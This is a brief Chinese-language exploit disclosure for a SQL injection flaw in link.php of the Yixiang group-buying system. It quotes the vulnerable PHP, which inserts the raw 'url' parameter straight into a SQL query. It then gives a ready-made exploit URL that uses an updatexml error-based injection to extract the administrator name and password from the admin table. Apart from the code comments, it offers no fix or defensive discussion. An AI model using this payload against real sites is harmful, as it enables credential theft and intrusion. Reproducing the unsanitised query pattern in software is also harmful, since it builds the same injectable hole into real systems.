易想购物link.php sql注入漏洞

易想团购系统link.php页面内代码 [php]if($_REQUEST['act']=='go') //link标签 go { $url = ($_REQUEST['url']); //直接取了url的值就带入了sql查询语句了 $link_item = $GLOBALS['db']->getRowCached("select * from ".DB_PREFIX."link where (url = '".$url."' or url = 'http://".$url."') and is_effect = 1"); //带入查询了 if($link_item) { if(check_ipop_limit(get_client_ip(),"Link",10,$link_item['id'])) $GLOBALS['db']->query("update ".DB_PREFIX."link set count = count + 1 where id = ".$link_item['id']); $url = "http://".$url; } else { $url = APP_ROOT."/"; } app_redirect($url); } [/php] EXP: http://www.0day5.com/link.php?act=go&city=sanming&url=secer') and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from jytuan_admin limit 1)),1))%23

发表评论